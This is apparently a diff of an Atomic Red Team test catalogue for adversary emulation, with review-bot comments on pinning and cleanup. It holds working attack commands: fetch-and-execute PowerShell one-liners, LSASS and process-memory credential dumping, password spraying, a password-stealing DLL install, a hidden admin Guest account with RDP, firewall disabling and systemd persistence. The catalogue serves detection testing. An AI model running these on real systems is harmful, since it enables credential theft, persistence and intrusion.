command: "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'
-UseBasicParsing); Get-PasswordVaultCredentials -Force \n"
- name: Dump credentials from Windows Credential Manager With PowerShell [web
Credentials]
auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
description: This module will extract the credentials from Windows Credential
Manager
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1''
-UseBasicParsing); Get-CredManCreds -Force
'
T1555.003:
technique:
created: '2020-02-12T18:57:36.041Z'
@@ -2247,6 +2339,7 @@ credential-access:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
Invoke-Kerberoast | fl
name: powershell
@@ -2760,6 +2853,7 @@ credential-access:
'
get_prereq_command: |
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
@@ -2801,6 +2895,7 @@ credential-access:
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -2855,6 +2950,7 @@ credential-access:
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
executor:
@@ -2909,6 +3005,7 @@ credential-access:
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
$request = [System.Net.WebRequest]::Create($url)
$response = $request.GetResponse()
@@ -2992,10 +3089,9 @@ credential-access:
supported_platforms:
- windows
executor:
command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'');
get-process lsass | Out-Minidump
'
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
'
@@ -3130,10 +3226,9 @@ credential-access:
prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
'
get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe"
-OutFile #{xordump_exe}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
executor:
command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
@@ -3944,8 +4039,9 @@ credential-access:
- description: NPPSpy.dll must be available in local temp directory
prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit
1}
get_prereq_command: Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll
-OutFile "$env:Temp\NPPSPY.dll"
get_prereq_command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
executor:
command: |-
Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
@@ -4273,6 +4369,9 @@ credential-access:
echo "1q2w3e4r" >> #{input_file_passwords}
echo "Password!" >> #{input_file_passwords}
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
cleanup_command: |-
del #{input_file_users}
del #{input_file_passwords}
- name: Brute Force Credentials of single domain user via LDAP against domain
controller (NTLM or Kerberos)
auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
@@ -4520,11 +4619,9 @@ credential-access:
executor:
name: powershell
elevation_required: false
command: 'IEX (IWR ''https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1''
-UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain
#{domain} -Force
'
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
- name: Password spray all domain users with a single password via LDAP against
domain controller (NTLM or Kerberos)
auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d
@@ -4839,7 +4936,106 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
atomic_tests: []
identifier: T1003.007
atomic_tests:
- name: Dump individual process memory with sh (Local)
auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
description: |
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: "/tmp/T1003.007.bin"
script_path:
description: Path to script generating the target process
type: Path
default: "/tmp/T1003.007.sh"
pid_term:
description: Unique string to use to identify target process
type: String
default: T1003.007
dependencies:
- description: 'Script to launch target process must exist
'
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
executor:
name: sh
elevation_required: true
command: |
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
grep -i "PASS" "#{output_file}"
cleanup_command: 'rm -f "#{output_file}"
'
- name: Dump individual process memory with Python (Local)
auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
description: |
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: "/tmp/T1003.007.bin"
script_path:
description: Path to script generating the target process
type: Path
default: "/tmp/T1003.007.sh"
python_script:
description: Path to script generating the target process
type: Path
default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
pid_term:
description: Unique string to use to identify target process
type: String
default: T1003.007
dependencies:
- description: 'Script to launch target process must exist
'
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
- description: 'Requires Python
'
prereq_command: "(which python || which python3 || which python2)\n"
get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed"
'
executor:
name: sh
elevation_required: true
command: |
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
PYTHON=$(which python || which python3 || which python2)
$PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"
cleanup_command: 'rm -f "#{output_file}"
'
T1606.002:
technique:
external_references:
@@ -6735,8 +6931,9 @@ collection:
'
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt"
-ErrorAction Ignore
@@ -9155,7 +9352,8 @@ privilege-escalation:
computer starts up various applications and may in fact drive you crazy. A
reliable way to make the message box appear and verify the \nAppInit Dlls
are loading is to start the notepad application. Be sure to run the cleanup
commands afterwards so you don't keep getting message boxes showing up\n"
commands afterwards so you don't keep getting message boxes showing up.\n\nNote:
If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n"
supported_platforms:
- windows
input_arguments:
@@ -11235,9 +11433,9 @@ privilege-escalation:
atomic_tests:
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
description: After execution the Default Guest account will be enabled (Active)
and added to Administrators and Remote Desktop Users Group, and desktop will
allow multiple RDP connections
description: |
After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
and desktop will allow multiple RDP connections.
supported_platforms:
- windows
input_arguments:
@@ -11249,6 +11447,10 @@ privilege-escalation:
description: Specify the guest password
type: String
default: Password123!
remove_rdp_access_during_cleanup:
description: Set to 1 if you want the cleanup to remove RDP access to machine
type: Integer
default: 0
executor:
command: |-
net user #{guest_user} /active:yes
@@ -11261,8 +11463,9 @@ privilege-escalation:
net user #{guest_user} /active:no >nul 2>&1
net localgroup administrators #{guest_user} /delete >nul 2>&1
net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
name: command_prompt
elevation_required: true
T1078.002:
@@ -15033,7 +15236,8 @@ privilege-escalation:
'
executor:
command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
name: powershell
@@ -15167,7 +15371,8 @@ privilege-escalation:
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
name: powershell
- name: Remote Process Injection in LSASS via mimikatz
@@ -15203,6 +15408,7 @@ privilege-escalation:
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -15215,6 +15421,7 @@ privilege-escalation:
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
@@ -16060,7 +16267,8 @@ privilege-escalation:
'
executor:
command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
name: powershell
@@ -17073,6 +17281,48 @@ privilege-escalation:
rm -rf #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
name: bash
- name: Create Systemd Service file, Enable the service , Modify and Reload the
service.
auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
description: "This test creates a systemd service unit file and enables it to
autostart on boot. Once service is created and enabled, it also modifies this
same service file showcasing both Creation and Modification of system process.
\n"
supported_platforms:
- linux
dependencies:
- description: 'System must be Ubuntu ,Kali OR CentOS.
'
prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
/etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
'
get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
'
executor:
name: bash
elevation_required: true
command: "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT
INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop
: \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic
Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import
os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod
+x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu)
] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002
defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then
chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali
OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho
\"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\"
| sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl
restart T1543.002\n"
cleanup_command: |
systemctl stop T1543.002
systemctl disable T1543.002
rm -rf /etc/init.d/T1543.002
systemctl daemon-reload
T1053.006:
technique:
id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
@@ -17442,8 +17692,9 @@ privilege-escalation:
supported_platforms:
- windows
executor:
command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-UseBasicParsing); Get-System -Technique NamedPipe -Verbose
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
name: powershell
elevation_required: true
- name: "`SeDebugPrivilege` token duplication"
@@ -17454,8 +17705,9 @@ privilege-escalation:
supported_platforms:
- windows
executor:
command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-UseBasicParsing); Get-System -Technique Token -Verbose
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
name: powershell
elevation_required: true
T1546.005:
@@ -18861,7 +19113,7 @@ defense-evasion:
command: |
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
bitsadmin.exe /resume #{bits_job_name}
timeout 5
bitsadmin.exe /complete #{bits_job_name}
@@ -20202,7 +20454,8 @@ defense-evasion:
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
name: powershell
elevation_required: true
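Review bot: The new Invoke-MalDoc URL in this command block points at the `master` branch of the atomic-red-team repository, so the script that `IEX` executes can change without any change to this test, while the other remote scripts touched by this same diff (Empire Get-System, PowerSploit PowerView) are pinned to a commit SHA. Pin it the same way, e.g. `https://raw.githubusercontent.com/redcanaryco/atomic-red-team/<COMMIT_SHA>/atomics/T1204.002/src/Invoke-MalDoc.ps1`, or record in the description why a moving reference is intended for this helper. The same pattern appears in the hunks at @@ -25023, -30570, -30704, -43942, -58178, -58239, -58277 and -58314.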
@@ -21404,9 +21657,9 @@ defense-evasion:
atomic_tests:
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
description: After execution the Default Guest account will be enabled (Active)
and added to Administrators and Remote Desktop Users Group, and desktop will
allow multiple RDP connections
description: |
After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
and desktop will allow multiple RDP connections.
supported_platforms:
- windows
input_arguments:
@@ -21418,6 +21671,10 @@ defense-evasion:
description: Specify the guest password
type: String
default: Password123!
remove_rdp_access_during_cleanup:
description: Set to 1 if you want the cleanup to remove RDP access to machine
type: Integer
default: 0
executor:
command: |-
net user #{guest_user} /active:yes
@@ -21430,8 +21687,9 @@ defense-evasion:
net user #{guest_user} /active:no >nul 2>&1
net localgroup administrators #{guest_user} /delete >nul 2>&1
net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
name: command_prompt
elevation_required: true
T1578.003:
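Review bot: With `remove_rdp_access_during_cleanup` at its default of 0 the rewritten cleanup leaves both Terminal Server registry values in place, so the Guest account changes are reverted but the host keeps RDP enabled; the argument's description in the preceding hunk only says "remove RDP access" and should state that trade-off, e.g. `Set to 1 to have cleanup delete the fDenyTSConnections and AllowTSConnections values the test writes; the default 0 leaves RDP enabled so an active remote session is not cut off` (the executor body that writes them is outside this hunk). Deleting the values also does not restore whatever was present before the test, which is worth a sentence in the description as well. The same two hunks are repeated under persistence at @@ -39078 and @@ -39090.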
@@ -22147,6 +22405,23 @@ defense-evasion:
'
cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1
'
name: command_prompt
- name: Disable Microsoft Defender Firewall via Registry
auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
description: |
Disables the Microsoft Defender Firewall for the public profile via registry
Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
supported_platforms:
- windows
executor:
command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
/v "EnableFirewall" /t REG_DWORD /d 0 /f
'
cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
/v "EnableFirewall" /t REG_DWORD /d 1 /f
'
name: command_prompt
- name: Allow SMB and RDP on Microsoft Defender Firewall
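Review bot: The new "Disable Microsoft Defender Firewall via Registry" test writes under HKEY_LOCAL_MACHINE but, unlike the neighbouring tests, carries no `elevation_required: true`, so a non-elevated runner gets an access-denied `reg add` and a misleading failure; add `elevation_required: true` after `name: command_prompt`. The description warns about the "current profile" while the key modified is `PublicProfile`, and the cleanup unconditionally sets `EnableFirewall` to 1 instead of restoring the value that was there before the test. Both points should be stated in the description so an operator knows the state the host ends in.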
@@ -25023,13 +25298,14 @@ defense-evasion:
command: |
$macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
$macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
'
name: powershell
- name: Create a user called "$" as noted here
- name: Create a Hidden User Called "$"
auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
description: Creating a user with a username containing "$"
supported_platforms:
@@ -27174,7 +27450,78 @@ defense-evasion:
x_mitre_version: '1.0'
x_mitre_defense_bypassed:
- Anti-virus, Application control
atomic_tests: []
identifier: T1553.005
atomic_tests:
- name: Mount ISO image
auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa
description: 'Mounts ISO image downloaded from internet to evade Mark-of-the-Web.
Upon successful execution, powershell will download the .iso from the Atomic
Red Team repo, and mount the image. The provided sample ISO simply has a Reports
shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
'
supported_platforms:
- windows
input_arguments:
path_of_iso:
description: Path to ISO file
type: path
default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso
dependency_executor_name: powershell
dependencies:
- description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso})
'
prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
executor:
command: 'Mount-DiskImage -ImagePath "#{path_of_iso}"
'
cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
'
name: powershell
- name: Mount an ISO image and run executable from the ISO
auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc
description: "Mounts an ISO image downloaded from internet to evade Mark-of-the-Web
and run hello.exe executable from the ISO. \nUpon successful execution, powershell
will download the .iso from the Atomic Red Team repo, mount the image, and
run the executable from the ISO image that will open command prompt echoing
\"Hello, World!\". \nISO provided by:https://twitter.com/mattifestation/status/1398323532988399620
Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,
\ "
supported_platforms:
- windows
input_arguments:
path_of_iso:
description: Path to ISO file
type: path
default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso
dependency_executor_name: powershell
dependencies:
- description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
'
prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
executor:
command: |
$keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
$driveLetter = ($keep | Get-Volume).DriveLetter
invoke-item "$($driveLetter):\hello.exe"
cleanup_command: |
Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
Stop-process -name "hello" -Force -ErrorAction ignore
name: powershell
T1036.004:
technique:
external_references:
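Review bot: In the second test the cleanup dismounts the image before stopping `hello.exe`, which is still running from that image; put `Stop-process -name "hello" -Force -ErrorAction ignore` before `Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null`, otherwise the dismount may fail or leave the volume attached. Both tests quote `#{path_of_iso}` in the executor but not in `prereq_command` (`Test-Path #{path_of_iso}`) or in `split-path #{path_of_iso}`, so a PathToAtomicsFolder containing a space breaks the prerequisite check. The two `Invoke-WebRequest` downloads in `get_prereq_command` also lack the `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` line this commit adds to the other download prerequisites.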
@@ -27406,7 +27753,33 @@ defense-evasion:
x_mitre_contributors:
- Yossi Weizman, Azure Defender Research Team
- Vishwas Manral, McAfee
atomic_tests: []
identifier: T1036.005
atomic_tests:
- name: Execute a process from a directory masquerading as the current parent
directory.
auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
description: 'Create and execute a process from a directory masquerading as
the current parent directory (`...` instead of normal `..`)
'
supported_platforms:
- macos
- linux
input_arguments:
test_message:
description: Test message to echo out to the screen
type: String
default: Hello from the Atomic Red Team test T1036.005#1
executor:
name: sh
elevation_required: false
command: |
mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo #{test_message}"
cleanup_command: |
rm -f $HOME/.../sh
rmdir $HOME/.../
T1556:
technique:
external_references:
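Review bot: `mkdir $HOME/...` has no `-p`, so a second run after an interrupted cleanup fails on the first line and never reaches the copy; `mkdir -p "$HOME/..."` is the idiomatic form, and `$HOME` should be quoted throughout for the same reason. `cp $(which sh) $HOME/...` relies on `which`, which is not guaranteed on minimal images, whereas `cp "$(command -v sh)" "$HOME/..."` uses a POSIX builtin available to the `sh` executor declared here.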
@@ -30570,7 +30943,8 @@ defense-evasion:
'
executor:
